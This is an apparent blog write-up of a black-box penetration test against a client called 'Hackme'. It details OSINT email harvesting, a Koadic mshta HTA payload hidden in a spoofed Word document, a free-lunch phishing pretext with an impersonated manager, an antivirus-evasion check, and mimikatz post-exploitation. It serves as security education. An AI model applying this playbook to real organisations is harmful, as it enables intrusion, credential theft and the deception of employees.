The Black Box Penetration Testing is a way to figure out how secure a system is without knowing how it works. Testers act like outside attackers and use information that is available to the public to find holes and exploit them.
The goal was simple: to see how vulnerable the organization is from the outside and to test how well the security controls that are managed across the whole organization work.
So, other than the name of the company, we had “ZERO” information to do external black-box security testing.
Penetration testing is an important part of a full security plan. It mimics real-world attacks to find holes in an organization’s systems.
Black box penetration testing is one of the most popular ways to do this kind of testing. The name “black box” comes from electronics and systems theory, where a “black box” is a system whose inner workings are unknown to the user or don’t matter.
This black-box external penetration Testing was performed by a client called (Hackme)
OSINT 101
Black-box Penetration Testing
Feed our Target list a Payload
The intended attack scenario was:
Don’t Forget the Anti-virus!!!
Conclusion
We kicked off with some Open Source Intelligence (OSINT) 101 :).
There are quite a number of open-source intelligence tools – to assist in gathering emails, subdomains, hosts, employee names, etc. from different public sources like search engines and Shodan. There is an exhaustive list of such awesome tools here.
Using quite a few open-source intelligence tools, we obtained publicly available documents relating to the organization using Black-box Penetration Testing methods.
With Google Dork to the rescue, we ran some basic search strings: “site:*.hackme.com ext:xls OR ext:docx OR ext:pptx”.
Also Read: Network Penetration Testing Checklist
Of course, our aim was not to tirelessly search for documents.
Rather, our objective was to understand the organization’s naming schema by examining the metadata of the documents which is found in the “properties section” of the document (most especially Microsoft Word, PowerPoint, and Excel). One can also use FOCA for this.
From this, I noticed that employees’ emails followed a particular naming convention – the first letter of the firstname + surname @ domain.com i.e. rakinyele@hackme.com.
Armed with this knowledge, we forked out from LinkedIn the list of all current employees of Hackme using the following Google Dork syntax:
site:linkedin.com -inurl:dir “at Hackme” “Current”. A typical example is shown below using Google Inc. as a reference company.
By hacking a script to automate the process, we copied out the first names, last names, and the roles of the current employees of Hackme.
A tiring approach is to manually crawl through the Google pages in search of these names and roles or one could also use GoogleScraper:
GoogleScraper -m http –keyword “site:linkedin.com -inurl:dir ‘at Hackme’ ‘Current'” –num-pages-for-keyword 3 –output-filename output.json
Again, I leave the possibilities to your imagination – but you can easily convert this to a .csv file using https://json-csv.com/ or any other converter that works for you.
then using your favorite word processor (Word Merge, Notepad++, etc.) or some good scriptural skills, merge the firstname + lastname – to form your email list.
Since we are simulating Black-box Penetration Testing, we decided (just like what an attacker would do) to gain code execution using malicious payloads.
As such, we thought of creating a payload and sending it via email to employees of Hackme.
We also know that it is a common practice for some file types/extensions to be blocked by the organization’s email filters – to limit exposure to risk.
This then brings us to using Koadic C3 COM Command & Control, a very decent framework just like your Meterpreter or Empire.
What made it really stand out aside from the beautiful interface is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan the local network for open SMB, pivot to another machine, load mimikatz, and a lot more.
So we ran Koadic and set the necessary variables – using the “stager/js/mshta ” module (serves payloads in memory using MSHTA.exe HTML Applications).
The result was a spawn of our HTA payload URL as evidenced in the screenshot above.
However, we need our targets to execute our payload as “mshta payload_url“.
In recent years, HTA payloads have been used as a web attack vector and also, to drop malware on a victim’s PC.
Now we need to get this payload past our victim’s numerous defenses.
Here comes the tricky part – we needed a way to have the victim run “mshta payload_url” without our payload being spawned as a child process of mshta.exe – as we suspect this organization’s blue team may flag this.
Thankfully, we saw the tip on the left from Matt Nelson and interestingly, the team at NCC group has this implemented in Demiguise.
So here is our final payload saved as a .hta file.
The next step typically is to send our .hta payload as an embedded OLE object.
Now we get to the interesting part, we need our victim to open the Microsoft Word document and our payload.
To do this, we need a very compelling story – just because users are getting smarter. So we headed back to doing more recon.
We need to know more about Hackme – specifically the culture and employees’ behavior.
The question we kept asking ourselves was “what would interest the employees?”
Where else to get this information than Glassdoor, a platform that gives you an inside scoop on companies with employee reviews about salaries, benefits, and pros and cons of working with the company?
After poring through reviews of Hackme on Glassdoor, we found some common themes:
We need to know more about the target organization’s environment – specifically employees.
The question we kept asking ourselves was – what would interest the employees?
Where else to get this information than Glassdoor, a platform that gives you an inside scoop on companies with employee reviews about salaries, benefits, and pros and cons of working with the company?
After poring through reviews of the target organization on Glassdoor, we found some common themes:
As the old saying goes, the fastest way to a man’s heart is through his stomach.
So what better way to get the employees to open our payload-embedded Word document?
Send them an email – telling them there is a change in the FREE LUNCH menu starting tomorrow.
Rather than send a random phishing email to employees that could be spotted easily, we decided a seemingly genuine email would be ideal complete with a Hackme email signature while observing the organization’s email culture.
Now, how do we make our email more believable? By sending an email to the Customer Service/Help Desk with a service request and observing the email signature in the response.
We headed back to Linkedin, to look for the name of either the HR Manager, Logistic Manager, or Admin Manager (whichever is appropriate) of Hackme. We carefully crafted an email signature with the name we selected.
We are halfway through sending our payload now. Have some patience and read on…
From the metadata recon done earlier, we could tell what our target organization’s document headers and footers looked like.
I then created a new Word document like the one shown below with a splitting image of Hackme document template with appropriate headers/footers.
Change the icon to Microsoft Word’s icon and also, change the caption to reflect your message.
To check the AV detection rate of our payload – and to see if it will be flagged as malicious by Hackme antivirus solution (if any), we did a quick AV scan on nodistribute.com. Nodistribute.com was used because according to them, they don’t distribute payload samples to AV companies. We scanned both the maldoc and the .hta files as well.
AV Scan of our .hta payload (0 detections)
If the target org does not have SPF, DKIM, and DMARC configured, one can easily spoof the HR Manager, Logistic Manager, or Admin Manager’s email address.
In this case, I created a Gmail account (yes, Gmail works too) using the Logistic Manager’s first name and last name – and then spiced it up with his signature which was gotten earlier.
Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!
What next?
The rest they often say is history. From here on, using the mimikatz modules, we escalated privileges, dumped hashes, scanned the local network of Hackme, pivoted into other PCs, browsed the target’s file systems, and even became domain admins, etc.
All in all, this was a very fun engagement. It may take an attacker a month/2months/a year of dedication to break into an organization – through a loophole at the infrastructure level.
Black box penetration testing is an important diagnostic tool because it mimics the methods and points of view of an outside attacker.
By not knowing how a system works on the inside, this method gives an accurate picture of how vulnerable an organization is to the outside world.
But, like any other method, it has some problems. Since it looks at things from an outsider’s point of view, it might miss some internal flaws.
It can be fairly easy for one to gain access by exploiting the human factor.
“Once you understand your target environment, devising a creative means in gaining access to the environment becomes fairly easy”.
The moral of the exercise is: Recon, recon, and more recon – for a wise man once said
“Give me six hours to chop down a tree and I will spend the first four sharpening the axe“.
1.Is penetration testing black box or white box?
Depending on what the tester knows, penetration testing can be either a black box or a white box. Black box testing pretends to be an attack from the outside, without knowing anything about the system being tested.
White box testing, on the other hand, gives the tester a lot of information, like the source code or diagrams of the design. The method used depends on the goals of the test and how in-depth it needs to be.
2. What is a black box penetration test?
A black box test is a way to figure out how secure a system is without knowing how it works. Testers act like outside attackers and use information that is available to the public to find holes and exploit them.
The main goal is to imitate a real-world attack so that security flaws can be found from an outsider’s point of view. This method helps find weaknesses that could be used against an organization and tries its defenses from the outside.
3. What is SAST and DAST?
SAST, or Static Application Security Testing, is a testing method that looks at an application’s source code, bytecode, or binary code without running it. This helps find security flaws early on in the development process.
On the other hand, DAST (Dynamic Application Security Testing) looks at running applications in real-time, usually from the outside, to find vulnerabilities that show up while the application is working.
Rotimi Akinyele – Rotimi is an experienced Cybersecurity, IT Governance, Risk, and Compliance (GRC) professional. He is an Assistant Manager, Cybersecurity at BDO UAE.
Hackers have reportedly infiltrated and extracted a vast 82 GB of sensitive data from the Indonesian…
IBM has issued a security bulletin warning of two vulnerabilities in its AIX operating system…
The Apache Software Foundation has issued a security alert regarding a critical vulnerability in Apache…
The Chinese National Internet Emergency Center (CNIE) has revealed two significant cases of cyber espionage…
A critical command injection vulnerability in the popular systeminformation npm package has recently been disclosed, exposing millions…
Researchers discovered a malware campaign targeting the npm ecosystem, distributing the Skuld info stealer through…
View Comments
Excellent pentesting guide. good work man.